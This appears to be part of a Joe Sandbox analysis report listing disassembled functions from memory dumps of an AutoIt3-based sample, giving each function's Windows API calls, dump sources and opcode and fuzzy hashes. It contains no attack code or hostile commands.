                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: adcec70e8a37bfe57af52c67972762965ac6ae8e87ef1560f0fcc7e62647577b
                                                                                                                • Instruction ID: 40bf8f849acf69849781afd0c8a3826e1ec8124cf0f1ad8d9c3c9407b877e8ba
                                                                                                                • Opcode Fuzzy Hash: adcec70e8a37bfe57af52c67972762965ac6ae8e87ef1560f0fcc7e62647577b
                                                                                                                • Instruction Fuzzy Hash: 2E115A35D51529DBCF04AFE4EA9CBEEBB78FF08741F410045E945B2180CB309560CBA9
                                                                                                                Function 00235BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                • String ID:
                                                                                                                • API String ID: 3016257755-0
                                                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction ID: e5d88f8cb4781cf605f1098d4baca4bfdf498094131a6239fe2d88594abc968f
                                                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                • Instruction Fuzzy Hash: 3D014BB202065EBBCF125E84DC45CEE7F66BB18758F588815FE1859031D636CAB1AB81
                                                                                                                Function 002280E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0022869D: __getptd_noexit.LIBCMT ref: 0022869E
                                                                                                                • __lock.LIBCMT ref: 0022811F
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0022813C
                                                                                                                • _free.LIBCMT ref: 0022814F
                                                                                                                • InterlockedIncrement.KERNEL32(00BD4018), ref: 00228167
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2704283638-0
                                                                                                                • Opcode ID: c791368a8222513e0bd9c197be3532b8e10f4c23952d324ad603c192457d1a6f
                                                                                                                • Instruction ID: 1464c6bdb15b550b4233daf7d306d485007189138eff0f75145f0a834df25274
                                                                                                                • Opcode Fuzzy Hash: c791368a8222513e0bd9c197be3532b8e10f4c23952d324ad603c192457d1a6f
                                                                                                                • Instruction Fuzzy Hash: FB015E31922632BBCB25AFA5B80A7A977A0BF04711F040155E818672D1CB34A872CFD2
                                                                                                                Function 0026DDEE Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0026DE07
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026DE1F
                                                                                                                • ScreenToClient.USER32(?,?), ref: 0026DE43
                                                                                                                • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0026DE5E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 357397906-0
                                                                                                                • Opcode ID: 60db9488b40147199c8978d3f2bc5069cc574ad7b2fef65fd141e4bf15ce1630
                                                                                                                • Instruction ID: 3e2d2a32c5019be7e936e33b0750c170d6488c6b50154c676c94008950cc1f98
                                                                                                                • Opcode Fuzzy Hash: 60db9488b40147199c8978d3f2bc5069cc574ad7b2fef65fd141e4bf15ce1630
                                                                                                                • Instruction Fuzzy Hash: 89111FB9D0020DEFDB41DF98D8849EEBBB9FB08210F108166E925E3250E735AA55CF50
                                                                                                                Function 00249C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00249C7F
                                                                                                                  • Part of subcall function 0024AD14: _memset.LIBCMT ref: 0024AD49
                                                                                                                • _memmove.LIBCMT ref: 00249CA2
                                                                                                                • _memset.LIBCMT ref: 00249CAF
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00249CBF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 48991266-0
                                                                                                                • Opcode ID: 3263346a8e0c2ffae9076f9c3f6658077f64446f7b6c80dd5a2895c2588082de
                                                                                                                • Instruction ID: a57ad9d8c53968218c96718964e35e31b3c2d7e8363bb403afe642db241d484e
                                                                                                                • Opcode Fuzzy Hash: 3263346a8e0c2ffae9076f9c3f6658077f64446f7b6c80dd5a2895c2588082de
                                                                                                                • Instruction Fuzzy Hash: 37F0307A201100ABCB056F54EC85A8ABB29EF89310B08C051FE085E257C735E825DFB5
                                                                                                                Function 0026E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0021B5EB
                                                                                                                  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B5FA
                                                                                                                  • Part of subcall function 0021B58B: BeginPath.GDI32(?), ref: 0021B611
                                                                                                                  • Part of subcall function 0021B58B: SelectObject.GDI32(?,00000000), ref: 0021B63B
                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0026E860
                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 0026E86D
                                                                                                                • EndPath.GDI32(00000000), ref: 0026E87D
                                                                                                                • StrokePath.GDI32(00000000), ref: 0026E88B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 1539411459-0
                                                                                                                • Opcode ID: fed650ec33460d7bc450e9a3fbe56cc081a63d6bb408dceec53fdecce46cbdd1
                                                                                                                • Instruction ID: 9534e03ce5889bda8670f152429462834c66e6433143d60261d2fc3a3267c299
                                                                                                                • Opcode Fuzzy Hash: fed650ec33460d7bc450e9a3fbe56cc081a63d6bb408dceec53fdecce46cbdd1
                                                                                                                • Instruction Fuzzy Hash: ABF0823900665ABBDF126F54BC0EFCE3F9AAF06311F048201FA11650E1C7795565DF95
                                                                                                                Function 0023D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0023D640
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0023D653
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0023D65A
                                                                                                                • AttachThreadInput.USER32(00000000), ref: 0023D661
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2710830443-0
                                                                                                                • Opcode ID: 704f3125cae17dd4b6f39b3476f32df37cd191935bf63278a6aae4fe17115c59
                                                                                                                • Instruction ID: 5393c34210fd05017deb6e11de308983d2bce75a748dffe0bf3e75a865b2eef6
                                                                                                                • Opcode Fuzzy Hash: 704f3125cae17dd4b6f39b3476f32df37cd191935bf63278a6aae4fe17115c59
                                                                                                                • Instruction Fuzzy Hash: BEE06D75202228BADB201FA2FC0EEDB7F2CEF117B1F008010B61C850A4DAB1A594CBA0
                                                                                                                Function 0023BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentThread.KERNEL32 ref: 0023BE01
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0023B9C9), ref: 0023BE08
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0023B9C9), ref: 0023BE15
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0023B9C9), ref: 0023BE1C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                                                • String ID:
                                                                                                                • API String ID: 3974789173-0
                                                                                                                • Opcode ID: 4ecdb4bda470f38a1be645eb45a75485464bbe64a672f7ab8a3bb73b4039158e
                                                                                                                • Instruction ID: c8f368c967ea748a5e2d7cd1f287c0fdd214cc0b8744568225a554c934151c88
                                                                                                                • Opcode Fuzzy Hash: 4ecdb4bda470f38a1be645eb45a75485464bbe64a672f7ab8a3bb73b4039158e
                                                                                                                • Instruction Fuzzy Hash: 33E08676A523119BD7102FB5BC0CF973BA8EF54792F148818F341DA0C0D7349445CB61
                                                                                                                Function 0021B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(00000008), ref: 0021B0C5
                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0021B0CF
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 0021B0E4
                                                                                                                • GetStockObject.GDI32(00000005), ref: 0021B0EC
                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 0027ECFA
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0027ED07
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0027ED20
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0027ED39
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0027ED59
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0027ED64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1946975507-0
                                                                                                                • Opcode ID: a4255a93ac720f092b276b41d7792d7b7dd4ba44a86e3b4fa292f39ddce666b7
                                                                                                                • Instruction ID: 33630f8634f8fde1eb4e77f19e74a05cd336210373a3e427867bb01cd60dae3c
                                                                                                                • Opcode Fuzzy Hash: a4255a93ac720f092b276b41d7792d7b7dd4ba44a86e3b4fa292f39ddce666b7
                                                                                                                • Instruction Fuzzy Hash: CCE0ED35510241AEEF225F74BC4DBD83B21AB55335F14C266F66D580E2C7714994DB21
                                                                                                                Function 0023C066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0023C071
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0023C07D
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023C086
                                                                                                                • CloseHandle.KERNEL32(?), ref: 0023C08E
                                                                                                                  • Part of subcall function 0023B850: GetProcessHeap.KERNEL32(00000000,?,0023B574), ref: 0023B857
                                                                                                                  • Part of subcall function 0023B850: HeapFree.KERNEL32(00000000), ref: 0023B85E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: 045b10f78d5f9d3d7943927130cf36eb5ab115f59a0f8ac22555345b874a2e59
                                                                                                                • Instruction ID: aed391ef4c4680ea6a24b5a20e56c2d6dd98077af9f4f32a9ac9ca0791282fe0
                                                                                                                • Opcode Fuzzy Hash: 045b10f78d5f9d3d7943927130cf36eb5ab115f59a0f8ac22555345b874a2e59
                                                                                                                • Instruction Fuzzy Hash: 33E0BF3A105006BBCB012F95FD4C859FB26FF493213144225F619819B0CB326435EB50
                                                                                                                Function 0027C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: ad2f7bb56b6069559edb64c93c523e089cf0217a5a5e6c98c8ddd9a5c319fd2c
                                                                                                                • Instruction ID: 8454cb8d24c986d4681f5bb13ea862a03a1e55c8213390421f117489775bdcec
                                                                                                                • Opcode Fuzzy Hash: ad2f7bb56b6069559edb64c93c523e089cf0217a5a5e6c98c8ddd9a5c319fd2c
                                                                                                                • Instruction Fuzzy Hash: 37E04FB9511214EFDB106F70EC4C6A93BE9EB4C360F51C405FC4A97290EAB598948F40
                                                                                                                Function 0027C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2889604237-0
                                                                                                                • Opcode ID: baa960c82edde8d1c6bfb08a164a1372e98b3ed3b2357a3399e78e5dafb88870
                                                                                                                • Instruction ID: cb736032d10b397d9688cb477268cb020f36a0faca3296f5db0dee2abdfa52f7
                                                                                                                • Opcode Fuzzy Hash: baa960c82edde8d1c6bfb08a164a1372e98b3ed3b2357a3399e78e5dafb88870
                                                                                                                • Instruction Fuzzy Hash: B0E04FB9501214EFDB006F70EC4C6593BE9EB4C360F518405FD4A97290EBB599948F00
                                                                                                                Function 00224C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __getptd_noexit.LIBCMT ref: 00224C3E
                                                                                                                  • Part of subcall function 002286B5: GetLastError.KERNEL32(?,00220127,002288A3,00224673,?,?,00220127,?,0020125D,00000058,?,?), ref: 002286B7
                                                                                                                  • Part of subcall function 002286B5: __calloc_crt.LIBCMT ref: 002286D8
                                                                                                                  • Part of subcall function 002286B5: GetCurrentThreadId.KERNEL32 ref: 00228701
                                                                                                                  • Part of subcall function 002286B5: SetLastError.KERNEL32(00000000,00220127,002288A3,00224673,?,?,00220127,?,0020125D,00000058,?,?), ref: 00228719
                                                                                                                • CloseHandle.KERNEL32(?,?,00224C1D), ref: 00224C52
                                                                                                                • __freeptd.LIBCMT ref: 00224C59
                                                                                                                • ExitThread.KERNEL32 ref: 00224C61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 408300095-0
                                                                                                                • Opcode ID: a5908b2f4f0ccc5c13b45eaca956ef112c05b09992275f841b52dd6f1e87baec
                                                                                                                • Instruction ID: f635cb478df2e435fc41f00abc7c43817899029050ff2c91911807ba607e99db
                                                                                                                • Opcode Fuzzy Hash: a5908b2f4f0ccc5c13b45eaca956ef112c05b09992275f841b52dd6f1e87baec
                                                                                                                • Instruction Fuzzy Hash: FFD0A731413A726BC2313FA4BD0D61D33549F01B25B018305E035250E08F2498254F91
                                                                                                                Function 00282350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: >$DEFINE
                                                                                                                • API String ID: 4104443479-1664449232
                                                                                                                • Opcode ID: 87b6146b3175d192f362fa61e5ca4919a50900e284e013991f9d8af198819df5
                                                                                                                • Instruction ID: 53a31a8480bae6f9395b576d6eed040c40323edf612e9ebd74a9c4e3bda78097
                                                                                                                • Opcode Fuzzy Hash: 87b6146b3175d192f362fa61e5ca4919a50900e284e013991f9d8af198819df5
                                                                                                                • Instruction Fuzzy Hash: FB129E79E2120ADFCF24DF98C4846ADB7B1FF48310F15825AE809AB391D734ADA5CB50
                                                                                                                Function 0023EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0023ECA0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ContainedObject
                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                • Opcode ID: 31cb610b2f6a92e1ea907830ed3072b44e1337b8dfc0b840f1227b38f778e0fa
                                                                                                                • Instruction ID: e3dd5dfcb8cf4b5e21121fcfab5fd98d4b08bfdbb2df3e69da47564c3e8a3a8c
                                                                                                                • Opcode Fuzzy Hash: 31cb610b2f6a92e1ea907830ed3072b44e1337b8dfc0b840f1227b38f778e0fa
